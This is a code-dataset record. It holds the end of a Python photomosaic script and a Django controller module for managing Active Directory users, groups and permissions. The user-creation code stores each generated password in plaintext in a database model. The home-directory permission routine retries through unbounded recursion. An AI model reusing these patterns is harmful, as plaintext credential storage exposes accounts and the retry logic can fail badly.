\"\"\"主函数,接收命令行动态传参\"\"\"\n # 定义命令行对象\n parser = argparse.ArgumentParser(description=\"Create a photomosaic from input images\")\n # 添加参数\n parser.add_argument('--target-image', dest='target_image', required=True)\n parser.add_argument('--input-folder', dest='input_folder', required=True)\n parser.add_argument('--grid-size', nargs=2, dest='grid_size', required=True)\n parser.add_argument('--output-file', dest='outfile')\n # 解析命令行参数\n args = parser.parse_args()\n grid_size = (int(args.grid_size[0]), int(args.grid_size[1]))\n output_filename = 'mosaic.png'\n if args.outfile:\n output_filename = args.outfile\n target_image = args.target_image\n input_imageDir = args.input_folder\n mosaic_image = createPhotomosaic(target_image, grid_size, input_imageDir)\n mosaic_image.save(output_filename, 'PNG')\n print(\"Success!\")\n\n\nif __name__ == '__main__':\n main()", "sub_path": "21_ImageMosaic/test4.py", "file_name": "test4.py", "file_ext": "py", "file_size_in_byte": 8137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 19, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 134, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 134, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 160, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 160, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 188, "usage_type": "call"}]} +{"seq_id": "75009522", "text": "import shlex\nimport time\nfrom api.controller import Controller\nfrom api.exceptions import HttpBadRequest\nfrom arma.core import Core\nfrom arma import models as arma_models, exceptions\nfrom arma.decorators import requires_permission\nfrom adum import models as adum_models\nfrom pwgen import pwgen\nfrom auth.backends import create_user\nfrom django.conf import settings\nimport ldap3\nimport os\nimport subprocess\n\n\nclass User(Controller):\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def _get_root(self):\n list = adum_models.MenuItem.objects.get(pk=self.args['list'])\n users = arma_models.User.search(None, list.query)\n out = []\n for user in users:\n out.append(self.serialize(user))\n return {'users': out}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def create(self):\n username = None\n for attr in self.args['public_attributes']:\n if attr['attribute'] == 'sAMAccountName':\n username = attr['set_value'].upper()\n break\n dn = \"cn=%s,%s\" % (username, self.args['dn'])\n attrs = {}\n for attr in self.args['attributes']:\n if attr['attribute'] == 'sAMAccountName':\n attrs[attr['attribute']] = attr['set_value'].upper()\n else:\n attrs[attr['attribute']] = attr['set_value'].encode(\"utf-8\")\n raw_password = pwgen(12, no_symbols=True)\n password = '\"%s\"' % raw_password\n password = password.encode('utf-16-le')\n attrs['unicodePwd'] = password\n user = arma_models.User.create(attrs=attrs, dn=dn)\n user.attr_replace('userAccountControl', '512')\n user.attr_replace('pwdLastSet', '0')\n for grp in self.args['groups']:\n group = arma_models.Group.open(grp['group_name'])\n user.add_to_group(group)\n au, u = create_user(username=username)\n template = adum_models.Template.objects.get(pk=self.args['id'])\n uc = adum_models.UserCreation(user=au, password=raw_password, template=template)\n uc.save()\n self.create_home_directory(user)\n return {'user': self.serialize(user)}\n\n def open(self):\n user = arma_models.User.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n return {'user': self.serialize(user)}\n\n def search(self):\n if len(self.args['query']) == 0:\n return {'groups': []}\n users = arma_models.User.search(self.args['query'])\n out = []\n for user in users:\n out.append(self.serialize(user))\n return {'users': out}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN,\n adum_models.Permission.TYPE_KLA,\n )\n def update(self):\n user = arma_models.User.open(self.args['sAMAccountName'])\n for key, value in self.args.items():\n if key == 'username':\n continue\n if value != user.get_first_attr(key):\n user.attr_replace(key, value)\n self.create_activity_item(key, value, user, self.request.user)\n return {'user': self.serialize(user)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def add_to_group(self):\n user = arma_models.User.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n group = arma_models.Group.open(self.args['group'])\n user.add_to_group(group)\n user.reload()\n self.create_activity_item('memberOf+', group.get_first_attr('sAMAccountName'), user, self.request.user)\n return {'user': self.serialize(user)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def remove_from_group(self):\n user = arma_models.User.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n group = arma_models.Group.open(self.args['group'])\n user.remove_from_group(group)\n user.reload()\n self.create_activity_item('memberOf-', group.get_first_attr('sAMAccountName'), user, self.request.user)\n return {'user': self.serialize(user)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def set_password(self):\n user = arma_models.User.open(self.args['sAMAccountName'])\n password_val = '\"%s\"' % self.args['password']\n password = password_val.encode('utf-16-le')\n user.attr_replace('unicodePwd', password)\n user.reload()\n self.create_activity_item('userPassword', 'secret', user, self.request.user)\n return {'user': self.serialize(user)}\n\n def create_home_directory(self, user):\n user.reload()\n path = user.get_first_attr('homeDirectory')\n os.mkdir(path)\n self.permission_home_directory(path, user.get_first_attr('sAMAccountName'))\n\n def permission_home_directory(self, path, username):\n cmd = \"icacls '%s' /grant '%s\\\\%s':(OI)(CI)M\" % (path, settings.DOMAIN_NAME, username)\n args = shlex.split(cmd)\n print(cmd)\n try:\n p = subprocess.Popen(args, stdout=subprocess.PIPE)\n p.wait()\n output1, _ = p.communicate()\n except subprocess.CalledProcessError as e:\n pass\n print(\"Output is \", output1)\n if b\"Failed processing 0 files\" not in output1:\n # time.sleep(2)\n self.permission_home_directory(path, username)\n cmd = \"icacls '%s' /setowner '%s\\\\%s' /T\" % (path, settings.DOMAIN_NAME, username)\n args = shlex.split(cmd)\n try:\n p = subprocess.Popen(args, stdout=subprocess.PIPE)\n p.wait()\n output2, _ = p.communicate()\n except subprocess.CalledProcessError as e:\n output2 = e.output\n return output1, output2\n\n def create_activity_item(self, attr, value, arma_affected, adum_creator):\n ai = adum_models.ActivityItem\n mapping = ai.ATTR_MAPPING\n if attr in mapping:\n type = mapping[attr]\n message = ai.MESSAGES[type]\n message_data = {\n 'creating_user': \"%s %s\" % (adum_creator.first_name, adum_creator.last_name),\n 'affected_object': \"%s %s\" % (arma_affected.first_name, arma_affected.last_name),\n 'value': value\n }\n message = message % message_data\n item = ai(\n type=type,\n message=message,\n affected_object_type=ai.T_USER,\n affected_object_name=arma_affected.get_first_attr('sAMAccountName'),\n creating_user=adum_creator\n )\n item.save()\n return item\n\n @classmethod\n def serialize(cls, user):\n out = {\n 'dn': user.dn,\n 'givenName': user.first_name,\n 'sn': user.last_name,\n 'sAMAccountName': user.username,\n 'mail': user.get_first_attr('mail'),\n 'description': user.get_first_attr('description'),\n 'activity': cls.get_activity(user)\n }\n try:\n member_of = user.attrs['memberOf']\n if len(member_of) > 0:\n members = []\n for member in member_of:\n try:\n group = arma_models.Group.open(member, open_attr='distinguishedName')\n members.append(Group.serialize(group))\n except exceptions.ObjectNotFound:\n pass\n out['member_of'] = members\n except KeyError:\n pass\n try:\n uc = adum_models.UserCreation.objects.get(user__username=user.username)\n out['letter_id'] = uc.template.letter.id\n except adum_models.UserCreation.DoesNotExist:\n pass\n return out\n\n @classmethod\n def get_activity(cls, user):\n ai = adum_models.ActivityItem.objects.filter(\n affected_object_type=adum_models.ActivityItem.T_USER,\n affected_object_name=user.get_first_attr('sAMAccountName')\n ).order_by('-created_at')[:10]\n out = []\n for item in ai:\n me = {\n 'message': item.message,\n 'created_at': item.created_at.strftime(\"%Y-%m-%d %H:%M:%S\")\n }\n out.append(me)\n return out\n\n\nclass Group(Controller):\n def open(self):\n group = arma_models.Group.open(self.args['sAMAccountName'])\n return {'group': self.serialize(group)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN,\n adum_models.Permission.TYPE_KLA,\n )\n def update(self):\n group = arma_models.Group.open(self.args['sAMAccountName'])\n for key, value in self.args.items():\n if key == 'username':\n continue\n group.attr_replace(key, value)\n self.create_activity_item(key, value, group, self.request.user)\n return {'group': self.serialize(group)}\n\n def search(self):\n if len(self.args['query']) == 0:\n return {'groups': []}\n groups = arma_models.Group.search(self.args['query'])\n out = []\n for group in groups:\n out.append(self.serialize(group))\n return {'groups': out}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def add_user(self):\n group = arma_models.Group.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n user = arma_models.User.open(self.args['user'])\n group.add_user(user)\n group.reload()\n self.create_activity_item('member+', user.get_first_attr('sAMAccountName'), group, self.request.user)\n return {'group': self.serialize(group)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def remove_user(self):\n group = arma_models.Group.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n user = arma_models.User.open(self.args['user'])\n group.remove_user(user)\n group.reload()\n self.create_activity_item(\n 'member-',\n user.get_first_attr('sAMAccountName'),\n group,\n self.request.user,\n reverse_object=user\n )\n return {'group': self.serialize(group)}\n\n def create_activity_item(self, attr, value, arma_affected, adum_creator, reverse_object=None):\n ai = adum_models.ActivityItem\n mapping = ai.ATTR_MAPPING\n if attr in mapping:\n type = mapping[attr]\n message = ai.MESSAGES[type]\n message_data = {\n 'creating_user': \"%s %s\" % (adum_creator.first_name, adum_creator.last_name),\n 'affected_object': \"%s\" % arma_affected.get_first_attr('sAMAccountName'),\n 'value': value\n }\n message = message % message_data\n item = ai(\n type=type,\n message=message,\n affected_object_type=ai.T_GROUP,\n affected_object_name=arma_affected.get_first_attr('sAMAccountName'),\n creating_user=adum_creator\n )\n item.save()\n return item\n\n @classmethod\n def get_activity(cls, user):\n ai = adum_models.ActivityItem.objects.filter(\n affected_object_type=adum_models.ActivityItem.T_GROUP,\n affected_object_name=user.get_first_attr('sAMAccountName')\n ).order_by('-created_at')[:10]\n out = []\n for item in ai:\n me = {\n 'message': item.message,\n 'created_at': item.created_at.strftime(\"%Y-%m-%d %H:%M:%S\")\n }\n out.append(me)\n return out\n\n @classmethod\n def serialize(cls, group):\n out = {\n 'dn': group.dn,\n 'sAMAccountName': group.name,\n 'activity': cls.get_activity(group)\n }\n\n try:\n members = group.attrs['member']\n if len(members) > 0:\n members_out = []\n for member in members:\n try:\n user = arma_models.User.open(member, open_attr='distinguishedName')\n members_out.append(User.serialize(user))\n except exceptions.ObjectNotFound:\n pass\n out['members'] = members_out\n except KeyError:\n pass\n\n return out\n\n\nclass Permission(Controller):\n model = adum_models.Permission\n\n def create(self):\n try:\n arma_models.Group.open(self.args['group_name'])\n except exceptions.ObjectNotFound:\n raise HttpBadRequest('Group does not exist')\n permission, created = adum_models.Permission.objects.get_or_create(\n type=self.args['type'],\n group_name=self.args['group_name']\n )\n permission.save()\n return self._format_singular(self._serialize(permission))\n\n def my_permissions(self):\n permissions = adum_models.Permission.objects.all()\n adum_user = adum_models.User.objects.get(user=self.request.user)\n arma_user = arma_models.User.open(adum_user.samaccountname)\n out = []\n for permission in permissions:\n if permission.type not in out:\n arma_group = arma_models.Group.open(permission.group_name)\n if arma_group.has_user(arma_user):\n out.append(permission.type)\n return self._format_plural({'permissions': out})\n\n def _can_delete(self):\n if self.model.type == adum_models.Permission.TYPE_SUPERUSER:\n if adum_models.Permission.objects.filter(type=adum_models.Permission.TYPE_SUPERUSER).count() == 1:\n return False\n return True\n return True\n\n\nclass Menu(Controller):\n model = adum_models.Menu\n\n def _pre_return(self, model, out):\n items = adum_models.MenuItem.objects.filter(menu=model)\n items_out = []\n for item in items:\n items_out.append(self.serializer(item).pack())\n out['items'] = items_out\n\n\nclass MenuItem(Controller):\n model = adum_models.MenuItem\n\n\nclass Search(Controller):\n def _get_root(self):\n results = Core.search(self.args['query'])\n out = []\n for result in results:\n me = {}\n if isinstance(result, arma_models.Group):\n me['type'] = 'group'\n me['dn'] = result.dn\n me['name'] = result.name\n me['text'] = \"Group: %s\" % result.name\n me['sAMAccountName'] = result.get_first_attr('sAMAccountName')\n elif isinstance(result, arma_models.User):\n me['type'] = 'user'\n me['dn'] = result.dn\n me['first_name'] = result.first_name\n me['last_name'] = result.last_name\n me['text'] = \"User: %s %s (%s)\" % (\n result.first_name,\n result.last_name,\n result.get_first_attr('sAMAccountName')\n )\n me['sAMAccountName'] = result.get_first_attr('sAMAccountName')\n else:\n continue\n out.append(me)\n return {'results': out}\n\n\nclass Template(Controller):\n model = adum_models.Template\n\n def _pre_return(self, model, out):\n if isinstance(model, adum_models.Template):\n out['attributes'] = self._iterate_and_serialize(adum_models.TemplateAttribute.objects.filter(template=model))\n out['groups'] = self._iterate_and_serialize(adum_models.TemplateGroup.objects.filter(template=model))\n\n\nclass TemplateAttribute(Controller):\n model = adum_models.TemplateAttribute\n\n\nclass TemplateGroup(Controller):\n model = adum_models.TemplateGroup\n\n\nclass Letter(Controller):\n model = adum_models.Letter", "sub_path": "frontend/controllers.py", "file_name": "controllers.py", "file_ext": "py", "file_size_in_byte": 16264, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "api.controller.Controller", "line_number": 17, "usage_type": "name"}, {"api_name": "adum.models.MenuItem.objects.get", "line_number": 23, "usage_type": "call"}, {"api_name": "adum.models.MenuItem", "line_number": 23, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 23, "usage_type": "name"}, {"api_name": "arma.models.User.search", "line_number": 24, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 24, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 24, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 18, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 19, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 19, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 20, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 20, "usage_type": "name"}, {"api_name": "pwgen.pwgen", "line_number": 47, "usage_type": "call"}, {"api_name": "arma.models.User.create", "line_number": 51, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 51, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 51, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 55, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 55, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 55, "usage_type": "name"}, {"api_name": "auth.backends.create_user", "line_number": 57, "usage_type": "call"}, {"api_name": "adum.models.Template.objects.get", "line_number": 58, "usage_type": "call"}, {"api_name": "adum.models.Template", "line_number": 58, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 58, "usage_type": "name"}, {"api_name": "adum.models.UserCreation", "line_number": 59, "usage_type": "call"}, {"api_name": "adum.models", "line_number": 59, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 30, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 31, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 31, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 32, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 32, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 65, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 65, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 65, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 65, "usage_type": "attribute"}, {"api_name": "arma.models.User.search", "line_number": 71, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 71, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 71, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 83, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 83, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 83, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 77, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 78, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 78, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 79, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 79, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 80, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 80, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 97, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 97, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 97, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 97, "usage_type": "attribute"}, {"api_name": "arma.models.Group.open", "line_number": 98, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 98, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 98, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 92, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 93, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 93, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 94, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 94, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 109, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 109, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 109, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 109, "usage_type": "attribute"}, {"api_name": "arma.models.Group.open", "line_number": 110, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 110, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 110, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 104, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 105, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 105, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 106, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 106, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 121, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 121, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 121, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 116, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 117, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 117, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 118, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 118, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 132, "usage_type": "call"}, {"api_name": "django.conf.settings.DOMAIN_NAME", "line_number": 136, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 136, "usage_type": "name"}, {"api_name": "shlex.split", "line_number": 137, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 140, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 140, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 143, "usage_type": "attribute"}, {"api_name": "django.conf.settings.DOMAIN_NAME", "line_number": 149, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 149, "usage_type": "name"}, {"api_name": "shlex.split", "line_number": 150, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 152, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 152, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 155, "usage_type": "attribute"}, {"api_name": "adum.models.ActivityItem", "line_number": 160, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 160, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 198, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 198, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 198, "usage_type": "name"}, {"api_name": "arma.exceptions.ObjectNotFound", "line_number": 200, "usage_type": "attribute"}, {"api_name": "arma.exceptions", "line_number": 200, "usage_type": "name"}, {"api_name": "adum.models.UserCreation.objects.get", "line_number": 206, "usage_type": "call"}, {"api_name": "adum.models.UserCreation", "line_number": 206, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 206, "usage_type": "name"}, {"api_name": "adum.models.UserCreation", "line_number": 208, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 208, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem.objects.filter", "line_number": 214, "usage_type": "call"}, {"api_name": "adum.models.ActivityItem", "line_number": 214, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 214, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem", "line_number": 215, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 215, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 228, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 230, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 230, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 230, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 239, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 239, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 239, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 233, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 234, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 234, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 235, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 235, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 236, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 236, "usage_type": "name"}, {"api_name": "arma.models.Group.search", "line_number": 250, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 250, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 250, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 261, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 261, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 261, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 261, "usage_type": "attribute"}, {"api_name": "arma.models.User.open", "line_number": 262, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 262, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 262, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 256, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 257, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 257, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 258, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 258, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 273, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 273, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 273, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 273, "usage_type": "attribute"}, {"api_name": "arma.models.User.open", "line_number": 274, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 274, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 274, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 268, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 269, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 269, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 270, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 270, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem", "line_number": 287, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 287, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem.objects.filter", "line_number": 310, "usage_type": "call"}, {"api_name": "adum.models.ActivityItem", "line_number": 310, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 310, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem", "line_number": 311, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 311, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 337, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 337, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 337, "usage_type": "name"}, {"api_name": "arma.exceptions.ObjectNotFound", "line_number": 339, "usage_type": "attribute"}, {"api_name": "arma.exceptions", "line_number": 339, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 348, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 349, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 349, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 353, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 353, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 353, "usage_type": "name"}, {"api_name": "arma.exceptions.ObjectNotFound", "line_number": 354, "usage_type": "attribute"}, {"api_name": "arma.exceptions", "line_number": 354, "usage_type": "name"}, {"api_name": "api.exceptions.HttpBadRequest", "line_number": 355, "usage_type": "call"}, {"api_name": "adum.models.Permission.objects.get_or_create", "line_number": 356, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 356, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 356, "usage_type": "name"}, {"api_name": "adum.models.Permission.objects.all", "line_number": 364, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 364, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 364, "usage_type": "name"}, {"api_name": "adum.models.User.objects.get", "line_number": 365, "usage_type": "call"}, {"api_name": "adum.models.User", "line_number": 365, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 365, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 366, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 366, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 366, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 370, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 370, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 370, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 376, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 376, "usage_type": "name"}, {"api_name": "adum.models.Permission.objects.filter", "line_number": 377, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 377, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 377, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 383, "usage_type": "name"}, {"api_name": "adum.models.Menu", "line_number": 384, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 384, "usage_type": "name"}, {"api_name": "adum.models.MenuItem.objects.filter", "line_number": 387, "usage_type": "call"}, {"api_name": "adum.models.MenuItem", "line_number": 387, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 387, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 394, "usage_type": "name"}, {"api_name": "adum.models.MenuItem", "line_number": 395, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 395, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 398, "usage_type": "name"}, {"api_name": "arma.core.Core.search", "line_number": 400, "usage_type": "call"}, {"api_name": "arma.core.Core", "line_number": 400, "usage_type": "name"}, {"api_name": "arma.models.Group", "line_number": 404, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 404, "usage_type": "name"}, {"api_name": "arma.models.User", "line_number": 410, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 410, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 427, "usage_type": "name"}, {"api_name": "adum.models.Template", "line_number": 428, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 428, "usage_type": "name"}, {"api_name": "adum.models.Template", "line_number": 431, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 431, "usage_type": "name"}, {"api_name": "adum.models.TemplateAttribute.objects.filter", "line_number": 432, "usage_type": "call"}, {"api_name": "adum.models.TemplateAttribute", "line_number": 432, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 432, "usage_type": "name"}, {"api_name": "adum.models.TemplateGroup.objects.filter", "line_number": 433, "usage_type": "call"}, {"api_name": "adum.models.TemplateGroup", "line_number": 433, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 433, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 436, "usage_type": "name"}, {"api_name": "adum.models.TemplateAttribute", "line_number": 437, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 437, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 440, "usage_type": "name"}, {"api_name": "adum.models.TemplateGroup", "line_number": 441, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 441, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 444, "usage_type": "name"}, {"api_name": "adum.models.Letter", "line_number": 445, 